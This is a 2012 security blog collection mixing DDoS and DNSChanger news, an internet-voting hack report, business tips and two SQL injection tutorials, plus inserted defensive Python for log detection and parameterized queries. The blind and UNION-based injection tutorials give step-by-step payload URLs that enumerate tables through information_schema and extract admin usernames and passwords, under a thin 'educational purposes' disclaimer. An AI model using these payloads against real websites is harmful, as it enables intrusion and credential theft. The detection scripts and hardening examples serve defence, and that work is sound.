Saturday, February 25, 2012

Understanding DDOS Attack


What is a DDoS Attack?
Compromised PCs, or “bots,” are formed into groups called “botnets” and are used as weapons by cyber-attackers to launch various forms of cyber attacks. These attacks range widely from DDoS to identity theft and clandestine intelligence gathering operations.
During Distributed Denial of Service attempts, attackers launch attacks using different techniques including HTTP, HTTPS, ICMP, SYN Floods, UDP Floods, DNS Request Floods, GET Floods, and others. The attack components are often used in combination, and range in size from a few hundred megabits per second (Mbps) to over 80 gigabits per second (Gbps). Increasingly sophisticated attacks are based around application requests at Layer-7.
Normally, a DDoS attack consists of 3 parts: the master, the slave and, finally, the victim. The master is the attack launcher, i.e. the person/machine behind all this (sounds cool, right?). The slave is the network that has been compromised by the master, and the victim is the target site/server. The master tells the compromised machines, the so-called slaves, to launch the attack on the victim's site/machine. Hence it is also called a coordinated attack.
How Do They Do It?
DDoS is done in 2 phases. In the first phase the attackers try to compromise weak machines in different networks around the world. This phase is called the Intrusion Phase. In the next phase they install DDoS tools and start attacking the victim's machines/site. This phase is called the Distributed DoS Attack Phase.

What Allowed Them to Do It?
  1. Vulnerable software/applications running on a machine or network.
  2. Open network setup.
  3. Network/machine setup done without taking security into account.
  4. No monitoring or data analysis being conducted.
  5. No regular audits / software upgrades being conducted.
First, identify whether you are really under attack. If yes, follow the steps below:
  • Check whether your machine's load is high and you have a large number of HTTP processes running.
To find the load, just use the command w or uptime.
E.g.:
falgun@localhost> w
 12:00:36 up 1 day, 20:27, 5 users, load average: 0.70, 0.70, 0.57
USER XYZ FROM LOGIN@ IDLE JCPU PCPU WHAT
To find out whether a large number of HTTP processes are running, use the command "ps aux | grep -i http | grep -v grep | wc -l"
E.g.:
[falgun@localhost]# ps aux | grep -i http | grep -v grep | wc -l
23
On a busy server, the number of connections will go above 100. But during a DDoS attack the number will go even higher, and that is when we need to find out which networks the attacks are coming from. In DDoS the individual host machine doesn't have much importance. It is the network that is of importance here, because an attacker will use any machine on the compromised network, or even all the machines in the network. Hence the network address is what matters when fighting the attack.
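As an added illustration (not part of the original post), the Python sketch below groups connections to the web port by source network rather than by host, which is the view the paragraph above argues for. The netstat sample, the /24 grouping and the threshold of 5 are constructed assumptions for the demo.

```python
import ipaddress
from collections import defaultdict

# Constructed `netstat -ant` output (documentation address ranges, not real traffic).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:80           203.0.113.5:40112       SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.9:40113       SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.77:51200      ESTABLISHED
tcp        0      0 192.0.2.10:80           203.0.113.140:51201     SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.201:33010     SYN_RECV
tcp        0      0 192.0.2.10:80           198.51.100.23:51514     ESTABLISHED
tcp        0      0 192.0.2.10:80           198.51.100.24:51515     ESTABLISHED
tcp        0      0 192.0.2.10:22           198.51.100.99:60022     ESTABLISHED
"""


def parse_connection(line, local_port):
    """Return (remote IPv4 address, TCP state) for a connection to local_port, else None."""
    fields = line.split()
    if len(fields) < 6 or not fields[0].startswith("tcp"):
        return None  # header or non-TCP line
    local, remote, state = fields[3], fields[4], fields[5]
    if state == "LISTEN" or local.rsplit(":", 1)[-1] != str(local_port):
        return None
    try:
        return ipaddress.IPv4Address(remote.rsplit(":", 1)[0]), state
    except ipaddress.AddressValueError:
        return None  # IPv6 or malformed address: out of scope for this sketch


def connections_per_network(netstat_text, local_port=80, prefix_len=24):
    """Count connections per source network: {network: {"total": n, "half_open": m}}."""
    stats = defaultdict(lambda: {"total": 0, "half_open": 0})
    for line in netstat_text.splitlines():
        parsed = parse_connection(line, local_port)
        if parsed is None:
            continue
        address, state = parsed
        network = str(ipaddress.ip_network(f"{address}/{prefix_len}", strict=False))
        stats[network]["total"] += 1
        if state == "SYN_RECV":  # handshake never completed, typical of a SYN flood
            stats[network]["half_open"] += 1
    return dict(stats)


def noisy_networks(netstat_text, threshold, local_port=80, prefix_len=24):
    """Networks with at least `threshold` connections, busiest first."""
    stats = connections_per_network(netstat_text, local_port, prefix_len)
    hits = [(net, s["total"], s["half_open"]) for net, s in stats.items()
            if s["total"] >= threshold]
    return sorted(hits, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    for net, total, half_open in noisy_networks(SAMPLE_NETSTAT, threshold=5):
        print(f"{net}: {total} connections, {half_open} half-open")
```

On a live server the input would be the output of netstat -ant, and the threshold would be set from the normal connection count for that machine.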
However, there are some actions you can take to protect yourself. Here's some basic advice:
  • Ensure that you have adequate bandwidth on your Internet connection. You'll be able to foil many low-scale DDoS attacks by simply having enough bandwidth (and processing power) to service the requests.
  • Deploy an intrusion prevention system on your network. Some (but definitely not all) DDoS attacks have recognizable signatures that an IPS can detect and use to prevent the requests from reaching the Web server.
  • Use a DDoS prevention appliance, including any of the Cisco Systems Inc. Cisco Guard products, that is specifically designed to identify and thwart distributed denial-of-service attacks.
  • Maintain a backup Internet connection with a separate pool of IP addresses for critical users. While you won't be able to switch all access to your website over to a backup connection (the attacks will switch at the same time!), you can provide critical users with an alternate path to your site if the primary circuit is swamped with bogus requests.
These tips should get you started on the road toward building a hardy Web infrastructure with the highest probability of surviving a DDoS attack. Good luck!




Friday, February 24, 2012

Small Coding Mistake Led to an Internet Voting System Failure


The main security weakness that let University of Michigan researchers take control over a planned city of Washington, D.C. Internet voting system pilot for overseas voters in 2010 was "a tiny oversight in a single line of code," the researchers say in a new paper (.pdf) detailing their exploits. City officials canceled the pilot shortly before the November election after the hack was revealed.
It's evidence, say the researchers--led by Assistant Professor J. Alex Halderman--that Internet voting should be postponed until, when or if major new breakthroughs in cybersecurity occur. Mistakes like the one they exploited are all too common, hard to eradicate, and indicative of a brittleness in web applications, they say. Seemingly trivial errors can result in attackers gaining system dominance--and in the case of an internet voting system, controlling the outcome of an election.  
Responding to a call by Washington, D.C., election officials for outsiders with no previous access to test system security, Halderman and his students penetrated the pilot system within 48 hours of it going online. Their successful attack went undetected for another 36 hours, they say, despite the fact that they left a calling card by making the vote confirmation screen play the University of Michigan fight song after 15 seconds. Even then, detection didn't occur because D.C. officials spotted anomalies in intrusion detection system logs, or even stumbled on the fight song itself, but because someone on a mailing list monitored by the city asked, "does anyone know what tune they play for successful voters?"
The main exploit the researchers used was a shell-injection vulnerability, triggered by uploading a fake ballot with a command function as the file extension. The file uploader plugin D.C. election officials used preserved the file extension, and the command line interpreter executed the command, the paper says.
Attackers also found that a system firewall filtered outbound network traffic, but that they could steal data by sending files to the images directory on the compromised server and retrieving it with any HTTP client.
Once inside the application server, they retrieved the public key for encrypting ballots, proceeding to replace all encrypted stored ballot files with forged votes. They also modified the system so that new ballots were sent to a subfolder in the images directory and the new originals replaced with more forgeries.
They also managed to violate the secrecy of balloting, the paper says, since before ballots were encrypted, the file uploader placed them in a temporary directory. But, the web application didn't delete the unencrypted ballots. The files did not contain a voter's identification, but did display the precinct and time of voting, letting researchers compare them to server application logs and associate them with people's identities.
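The two server-side mistakes described above, the client-supplied extension reaching a shell and plaintext ballots left in the temporary directory, can be avoided as in the following added Python example, which is not code from the D.C. system or from the paper. The .pdf allowlist and the stand-in encryption command are assumptions.

```python
import os
import secrets
import subprocess
import sys
import tempfile

ALLOWED_EXTENSIONS = {".pdf"}  # assumption: ballots are uploaded as PDF files

# Stand-in for the real encryption program (assumption): copies argv[1] to argv[2].
STAND_IN_TOOL = [
    sys.executable, "-c",
    "import shutil, sys; shutil.copyfile(sys.argv[1], sys.argv[2])",
]


def stored_name(client_filename):
    """Pick the on-disk name server-side; only an allowlisted extension survives."""
    extension = os.path.splitext(client_filename)[1].lower()
    if extension not in ALLOWED_EXTENSIONS:
        raise ValueError("unsupported ballot file type")
    return secrets.token_hex(16) + extension


def process_ballot(data, client_filename, out_dir, tool=STAND_IN_TOOL):
    """Encrypt an uploaded ballot; return (encrypted_path, plaintext_temp_path)."""
    name = stored_name(client_filename)  # rejects before anything touches disk
    fd, temp_path = tempfile.mkstemp(suffix=os.path.splitext(name)[1])
    try:
        with os.fdopen(fd, "wb") as handle:
            handle.write(data)
        out_path = os.path.join(out_dir, name + ".enc")
        # Argument list and no shell: the path is a single argv entry and is
        # never parsed as a command line.
        subprocess.run([*tool, temp_path, out_path], check=True)
        return out_path, temp_path
    finally:
        # The plaintext ballot is removed whether or not encryption succeeded.
        if os.path.exists(temp_path):
            os.remove(temp_path)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as out_dir:
        encrypted, plaintext = process_ballot(b"%PDF-1.4 constructed ballot",
                                              "ballot.pdf", out_dir)
        print("stored as", os.path.basename(encrypted))
        print("plaintext still on disk:", os.path.exists(plaintext))
```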
In perhaps the greatest oversight by city officials, researchers also found in the temporary directory a 937-page .pdf document containing real voters' credentials for using the system, meaning that attackers could have cast votes as those citizens in the real election.
"One small mistake in the configuration or implementation of the central voting servers or their surrounding network infrastructure can easily undermine the legitimacy of the entire election," they conclude.

For more:
download the paper from J. Alex Halderman's website (.pdf)
Source - http://www.fiercegovernmentit.com/story/small-coding-mistake-led-big-internet-voting-system-failure/2012-02-22

Thursday, February 23, 2012

Blind SQL Injection Tutorial Illustrated


Blind injection is a little more complicated than the classic injection, but it can be done :D

It's somewhat hard, but good to learn.

1) http://www.site.com/news.php?id=5

When we execute this, we see a page with articles, pictures etc. Then we want to test it for a blind SQL injection attack:

2) http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's OK. Now the real test:

3) http://www.site.com/news.php?id=5 and 1=2 <--- this is false

So if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection. Hacker's work started :)

1) Get the MySQL version

To get the version in a blind attack we use substring,
i.e.
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

This should return TRUE if the version of MySQL is 4. Replace 4 with 5, and if the query returns TRUE then the version is 5,
i.e.
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
When select doesn't work, we use subselect,
i.e.
http://www.site.com/news.php?id=5 and (select 1)=1

If the page loads normally then subselects work. Then we are going to see if we have access to mysql.user,
i.e.
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally we have access to mysql.user, and then later we can pull some passwords using the load_file() function and OUTFILE.

3) Check table and column names. This is the part where guessing is the hacker's best friend ...
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(With limit 0,1 our query here returns 1 row of data, because a subselect returns only 1 row; this is very important.)

Then if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right one :)

Let's say that we have found that the table name is users; now what we need is a column name.
Same as with the table name, we start guessing. Like I said before, try the common names for columns,
i.e.
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

If the page loads normally we know that the column name is password (if we get false then try common names or just guess).
Here we merge 1 with the column password, then substring returns the first character (,1,1).


4) Pull data from database
We found the table users with columns username and password, so we are going to pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK, this pulls the first character from the first user in table users.
substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value, which is then compared using the greater-than symbol >.
So if the ASCII value is greater than 80, the page loads normally (TRUE).
We keep trying until we get FALSE.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

So the first character in username is char(99). Using an ASCII converter we know that char(99) is the letter 'c'.

Then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

We know that the second character is char(105) and that is 'i'. We have 'ci' so far,
so keep incrementing until you get to the end (when >0 returns false we know that we have reached the end).
There are some tools for blind SQL injection; I think sqlmap is the best, but I'm doing everything manually,
because that makes you a better SQL INJECTOR :D

Hope you learned a lot from this. This is just for educational purposes.
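Added example, not from the original tutorial: the true/false behaviour that tests 2) and 3) rely on exists only when the id parameter is pasted into the SQL text. The Python sketch below uses an in-memory SQLite database with constructed rows as a stand-in for the site's MySQL and sends the same two requests to a concatenated query and to a parameterized one.

```python
import sqlite3

# The true/false pair from tests 2) and 3) on this page.
PROBE_TRUE = "5 and 1=1"
PROBE_FALSE = "5 and 1=2"


def make_db():
    """In-memory SQLite database with constructed rows (stand-in for the site's MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (5, 'Constructed sample article');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('constructed_user', 'constructed_hash');
    """)
    return db


def article_concatenated(db, raw_id):
    """Vulnerable: the id parameter becomes part of the SQL text."""
    return db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()


def article_parameterized(db, raw_id):
    """Hardened: the id parameter is bound as a value and is never parsed as SQL."""
    return db.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()


def article_strict(db, raw_id):
    """Hardened plus validation: anything that is not a plain integer is rejected."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    return article_parameterized(db, int(raw_id))


def answers_true_false(fetch, db):
    """True when the returned content differs between the two probes (a boolean oracle)."""
    return fetch(db, PROBE_TRUE) != fetch(db, PROBE_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("concatenated query answers true/false:",
          answers_true_false(article_concatenated, db))
    print("parameterized query answers true/false:",
          answers_true_false(article_parameterized, db))
```

Binding removes the oracle because both probes are compared as plain values; the strict variant also avoids depending on how a particular database compares a non-numeric string with an integer column.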


Fake Access Point .... Pawning The System Part 1


A very good video that I want to share with you guys; it's really interesting :) Just enjoy making a fake access point.
I got many mails and messages to post something related to ethical hacking and cyber security.

Requirements - BackTrack PenTest OS (download it from www.backtrack-linux.org)

Wednesday, February 22, 2012

AI - Artificial Intelligence an approach


WHAT IS ARTIFICIAL INTELLIGENCE?
Artificial Intelligence (AI) is the study and creation of computer systems that can perceive, reason and act. The primary aim of AI is to produce intelligent machines. The intelligence should be exhibited by thinking, making decisions, solving problems and, more importantly, by learning. AI is an interdisciplinary field that requires knowledge of computer science, linguistics, psychology, biology, philosophy and so on for serious research.
STRONG ARTIFICIAL INTELLIGENCE
It deals with the creation of real intelligence artificially. Strong AI believes that machines can be made sentient or self-aware. There are two types of strong AI: human-like AI, in which the computer program thinks and reasons at the level of a human being, and non-human-like AI, in which the computer program develops a non-human way of thinking and reasoning.
WEAK ARTIFICIAL INTELLIGENCE
Weak AI does not believe that creating human-level intelligence in machines is possible but AI techniques can be developed to solve many real-life problems.
AI AND NATURE
Nowadays AI techniques developed with inspiration from nature are becoming popular. A new area of research known as Nature Inspired Computing is emerging. Biologically inspired AI approaches such as neural networks and genetic algorithms are already in place.
CHALLENGES
It is true that AI has not yet achieved its ultimate goal. AI systems still cannot beat even a three-year-old child on many counts: the ability to recognize and remember different objects, adapt to new situations, understand and generate human languages, and so on. The main problem is that we still do not understand how the human mind works, how we learn new things, and especially how we learn languages and reproduce them properly.
APPLICATIONS
There are many AI applications that we witness: robotics, machine translators, chatbots and voice recognizers, to name a few. AI techniques are used to solve many real-life problems. Some kinds of robots are helping to find land mines and to search for humans trapped in rubble after natural calamities.
FUTURE OF AI
AI is the best field for dreamers to play around in. It must be evolved from the thought that making a human-machine is possible. Though many conclude that this is not possible, there is still a lot of research going on in this field to attain the final objective. There are inherent advantages to using computers, as they do not get tired or lose their temper and are becoming faster and faster. Only time will tell what the future of AI will be: will it attain human-level or above human-level intelligence or not.

This is just a basic concept that I want to discuss with you guys. For more resources:

www.jair.org
http://www-formal.stanford.edu/jmc/whatisai/




Monday, February 20, 2012

Six Strategies for Partnering with Big Brands


Many of you are wondering how to become a partner of big brands, as it helps a lot in gaining value and status in the market. That is what we are going to discuss in this post.

The Trenton, N.J.-based company's first big partnership with Wal-Mart in Canada was just the start of what has become a $14 million business. TerraCycle now gathers unrecyclable trash and converts it into products and packaging for such big brands as Kraft, Pepsi and Mars. Last year, corporate partners spent $45 million on TerraCycle-related marketing--far more than Szaky could have ever done alone.

But breaking in with big companies is no easy feat. For Szaky, it took lots of research, persistence and trial and error. "The biggest mistake small companies make is they don't do enough homework," says Brant Slade, co-author of Think BIG!: An Entrepreneur's Guide to Partnering With Large Companies (Course Technology PTR, 2009). "They think … more from the small business point of view as opposed to thinking from the large business point of view."

Here's a checklist to help your small business prepare to partner with big brands:

1. Be unique. Make sure your business pitch is carefully thought out and offers value to your potential partner. After Robin Thurston co-founded MapMyFITNESS.com, an Austin, Texas-based fitness social network that offers online routes, training and group activities, he and his partner realized they had developed a geo-location technology that bigger companies wanting online fitness tools and access to a social network could use. With their first corporate partner, Cadbury's Accelorade sports drink, they collaborated on a web interface enabling users on their site to map and share workouts. "You have to have something that is clearly valuable to that big brand that they might not want to spend the time investing in or doing," Thurston says. Now, the company also builds web platforms and mobile phone apps for brands like NBC Sports, Humana and Skechers, whose customers can opt into the MapMyFITNESS social network.

2. Remain persistent. Although Szaky had the worm-excrement-in-a-recycled-bottle market cornered, getting that first deal with Wal-Mart in 2005 still required persistence. After scouring LinkedIn and alumni networks to find the right contact, Szaky called Wal-Mart 10 times a day, every day for three weeks until he finally got through and set up a meeting. Big companies field lots of requests, so persistence is a must. "There are some brands we are working with today that literally were five-year conversations," Thurston says.

3. Think big. You have to think like a big brand to partner with one. For MapMyFITNESS, that means developing large-scale projects. "A big brand doesn't want to talk about a $10,000 project," Thurston says. "They want to talk in seven figures and really big user numbers." For example, Thurston and his partner proposed that big companies give away their product with subscriptions to the MapMyFITNESS website. The size of their user base--nearly seven million today--was large enough to interest brands like Procter & Gamble's Febreze.

4. Plan for fast growth. If you're growing too quickly to keep up with demand, you'll lose money--and probably your partner. Szaky learned that lesson through experience. "The more we grew, the more we lost," he says. While TerraCycle's sales reached $6.6 million in 2008, it had a net loss of $4.5 million. The next year, Szaky began developing agreements with companies to handle production for him. Today, 40 companies make and sell TerraCycle products for major retailers and TerraCycle turned a profit of $100,000 in the last year.

Polka Dog Bakery, a Boston-based dog treat maker slated to expand into 1,763 Target stores this May, let the retailer oversee production and distribution in order to make the partnership feasible. "It would have been too much for us to expand at that capacity," says cofounder Robert Van Sickle of his 11-person company.

5. Prepare for scrutiny. Make sure your financial and legal affairs are in order. Since TerraCycle works with multinational companies, the company gets audited every two months. After failing the first few audits in his early partnerships, Szaky realized he needed to focus more on developing proper procedures. "If you are going to go down the path of working in big businesses, having your house in order is critical," he says. "You are going to get the growth but you are also going to get a lot more scrutiny."

6. Build on existing partnerships. Don't rush to find the next partner once you successfully link up with a big company. MapMyFITNESS gets a lot of new business from expanding existing partnerships, Thurston says. Companies are often more willing to consider developing a licensing partnership, for example, if they're already buying advertising on your website. "Too many entrepreneurs chase after the next client instead of recognizing the current client could mean a lot more revenue for them if they simply explore other revenue channels," Thurston says. Partnerships now account for a third of his company's total revenue.

Hope your business goes well :) God bless you.

8th March Internet is going to be ShutDown ?



Security firm Internet Identity has revealed that more than half of all Fortune 500 companies and major U.S. federal agencies are infected with malware called DNSChanger. The company discovered that as of early January a minimum of 250 Fortune 500 companies had one or more computers or routers infected with the malware, as did 27 out of 55 federal agencies. On November 9th the FBI announced the arrest of six Estonian nationals in relation to DNSChanger, which was believed to have infected approximately four million computers globally (including 500,000 in the United States) and generated close to $14 million in illicit advertising money. According to the FBI, DNSChanger affected computers in two ways, both of which generated advertising revenue: click hijacking, in which users would click on a search result link and be re-routed to another site, producing per-click advertising payouts; as well as advertising replacement fraud, which would replace legitimate ads on a website with substitutes that would trigger payments.

During the arrests, known as Operation Ghost Click, the FBI seized a number of computer systems that were being used as rogue DNS servers. These weren't shut down but were instead replaced with legitimate servers. However, the legitimate servers were only a temporary solution put in place for 120 days, after which point the "internet may literally go dark" for the remaining infected computers, according to Internet Identity. There are reportedly still "millions" of PCs infected with the malware that could potentially go dark on March 8th if the FBI doesn't secure an extension for the replacement DNS servers.

A group called the DNS Changer Working Group ("an ad hoc group of subject matter experts" that consists of organizations like Georgia Tech, the University of Alabama at Birmingham, Trend Micro, Neustar, and more) is offering to identify infected IP addresses for free. The group's site offers tips on checking for DNSChanger on OSX, XP, Windows 7, and home routers, while larger organizations can email the group to see whether any of their networks is infected.

Source - http://www.theverge.com/2012/2/17/2806752/dnschanger-malware-fortune-500-federal-agencies

Be a Writer for our Magazine on Information Technology

The most important thing for us is your point of view on the topics that interest you; that is the best way to create a good article.

Articles need to contain a minimum of 3500 words and 3 or more graphics/pictures. The deadline for the first issue of the magazine is 29 Feb.

Please don't forget to attach your short "author's bio" and your photo, and an advert for your company as well.

I'm sending you our expectations for the articles:

The article should be written specially for our magazine, covering the topics given below:

1) Hardware

2) Software

3) Networking

4) Internet

5) Programming

6) Ethical Hacking and Security

7) Mobile World

8) Miscellaneous

Articles should be based on your own experience or the field you are interested in. They can also describe a new project you are working on.

The article consists of:

* title
* lead (few sentences introducing the topic)
* introduction (in first sentences you write for a reader what he gets to know after reading your article and what skills he will be taught)
* body (describing the topic step by step)
* conclusion
* author's bio and her/his photo
* other materials if applicable
* 3 or more graphics


Note: Please don't copy and paste, and don't be a leecher. The article should be interactive with the reader in terms of the content written.

Mail your article to cyberoctet@gmail.com, and if you have any questions feel free to contact us at cyberoctet@gmail.com

Wednesday, February 15, 2012

Beginners Tutorial of SQL Injection

While on the way to Bangalore I decided to post a basic tutorial on SQL injection. Normally people who know SQL injection call themselves hackers, but it's not so; SQL injection is just a trailer, and I will suggest you look at other injections also :) So now let's learn.

SQL Injection

“SQL injection is a type of vulnerability in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.” A resource field is usually considered a column in a database that holds important data about an organization. Validation is key to making sure these SQL statements don’t contain the malicious code needed to illegally obtain unauthorized information. This can be done against any database, as no one vendor is exempt. “SQL injection is not a defect of Microsoft SQL Server – it is also a problem for every other database vendor as well.” Let’s take a look at how SQL injection works by looking at a simple database with user names and passwords. In a normal database, the table named “Login” would look like the table given below.

Command         Function
SELECT          Selects rows (records)
INSERT INTO     Inserts rows (records)
DELETE          Deletes rows (records)
UPDATE          Changes rows (records)
CREATE TABLE    Creates a new table

The database is not the only entity that can be affected here; the criminal can also access the network as well as the operating system at this point. SQL statements can be written to bypass the signatures of intrusion detection systems; however, the discussion of this goes beyond the scope of this paper. The best defense is to check all input and validate at all tiers.

Example

SQL injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack on other databases such as Oracle. In this tutorial I will be showing you the steps to carry out the attack on a MySQL database.

Step 1:

When testing for SQL Injection vulnerabilities, you need to find a page that looks like this:

www.site.com/id=1

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/id=1'

If the database is vulnerable, the page will give an error or blank page.

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

http://www.site.com/id=1 order by 1--

http://www.site.com/id=1 order by 2--

http://www.site.com/id=1 order by 3--

http://www.site.com/id=1 order by 4--

http://www.site.com/id=1 order by 5--

If we receive an error here, then that means we have 4 columns.

Step 3

We now are going to use the "union" command to find the vulnerable columns.

for example:

www.site.com/page=1 union all select 1,2,3,4--

Suppose 2 is shown; then our targeted column is 2.

Step 4

We now need to find the database version. We do this by replacing the vulnerable column numbers with the following query:

For example the url would look like:

www.site.com/page=1 union all select 1,version(),3,4--

or

www.site.com/page=1 union all select 1,@@version,3,4--

The resulting page would then show the database user and then the MySQL version. For example 5.0.83.

Step 5

In this step our aim is to list all the table names in the database.

www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Now look for admin tables or member or user tables.

Step 6

In this step we want to list all the column names in the table we have found, for example 'admin'. To do this we use the following command:

www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin'--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email and password.

Step 7

Finally we need to dump the data. Say we want to get the "username" and "password" fields from the table "admin"; we would use the following command:

www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you don’t have to guess. If this command is successful then you should be presented with a page full of usernames and passwords from the website.

This tutorial is just for knowledge purposes, not to harm. If anyone does, then the responsibility is all yours :)

Cheers ....
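From the defender's side, the requests in Steps 1 to 7 leave a recognizable trail in the web server's access log. The following Python example is added here and is not part of the original tutorial; it flags clients whose query strings match those request shapes, using constructed log lines and a hypothetical /news.php path.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges); the second client
# replays the request shapes of Steps 1-5 above.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Feb/2012:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [15/Feb/2012:10:00:09 +0000] "GET /search.php?q=o'brien+order+by+post HTTP/1.1" 200 2048
203.0.113.50 - - [15/Feb/2012:10:01:00 +0000] "GET /news.php?id=1' HTTP/1.1" 500 312
203.0.113.50 - - [15/Feb/2012:10:01:04 +0000] "GET /news.php?id=1%20order%20by%201-- HTTP/1.1" 200 5120
203.0.113.50 - - [15/Feb/2012:10:01:06 +0000] "GET /news.php?id=1%20order%20by%202-- HTTP/1.1" 200 5120
203.0.113.50 - - [15/Feb/2012:10:01:08 +0000] "GET /news.php?id=1%20order%20by%203-- HTTP/1.1" 200 5120
203.0.113.50 - - [15/Feb/2012:10:01:10 +0000] "GET /news.php?id=1%20order%20by%204-- HTTP/1.1" 200 5120
203.0.113.50 - - [15/Feb/2012:10:01:12 +0000] "GET /news.php?id=1%20order%20by%205-- HTTP/1.1" 500 312
203.0.113.50 - - [15/Feb/2012:10:01:30 +0000] "GET /news.php?id=1%20union%20all%20select%201,2,3,4-- HTTP/1.1" 200 5150
203.0.113.50 - - [15/Feb/2012:10:01:41 +0000] "GET /news.php?id=1%20union%20all%20select%201,@@version,3,4-- HTTP/1.1" 200 5150
203.0.113.50 - - [15/Feb/2012:10:02:02 +0000] "GET /news.php?id=1%20UNION%20SELECT%201,table_name,3,4%20FROM%20information_schema.tables-- HTTP/1.1" 200 9000
"""

# client, request URL and status code of a common/combined log format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# One pattern per request shape; matched against the decoded, lowercased query string.
SIGNATURES = {
    "quote_probe": re.compile(r"'\s*$"),                        # Step 1: trailing '
    "order_by_n": re.compile(r"\border\s+by\s+(\d+)"),           # Step 2: column count sweep
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),  # Steps 3-7
    "version_probe": re.compile(r"@@version|\bversion\s*\("),    # Step 4
    "schema_enum": re.compile(r"\binformation_schema\."),        # Steps 5-6
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),       # and 1=1 / and 1=2 pair
}


def analyse(log_text):
    """Per client: matched signature names, ORDER BY indexes tried, 5xx count on flagged requests."""
    clients = defaultdict(lambda: {"signals": set(), "order_by": set(), "errors": 0})
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        client, url, status = match.groups()
        query = unquote_plus(url.partition("?")[2]).lower()
        hits = {name for name, rx in SIGNATURES.items() if rx.search(query)}
        if not hits:
            continue
        entry = clients[client]
        entry["signals"] |= hits
        entry["order_by"] |= {int(n) for n in SIGNATURES["order_by_n"].findall(query)}
        if status.startswith("5"):
            entry["errors"] += 1
    return dict(clients)


def suspicious_clients(log_text, min_signals=2):
    """Clients that matched at least `min_signals` different signatures."""
    report = analyse(log_text)
    return sorted(c for c, e in report.items() if len(e["signals"]) >= min_signals)


if __name__ == "__main__":
    for client, entry in analyse(SAMPLE_LOG).items():
        print(client, sorted(entry["signals"]), sorted(entry["order_by"]), entry["errors"])
```

Requiring two or more different signatures per client keeps a single stray quote or the word "union" in a search box from raising an alert on its own.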

Tuesday, February 14, 2012

Why 2012 Will Be a Year of Cyber Crime "a Cyber Doom Year"

For online security professionals, 2012 is turning out to be a banner year. Prominent hacks are taking place nearly every week. Credit card fraud and piracy on the Internet are booming. Hacktivist attacks against government computers and private companies are occurring almost daily. Big-name government agencies and businesses everywhere are shelling out for security assistance ... but for everyday Internet users, it's a giant headache with unclear risks.

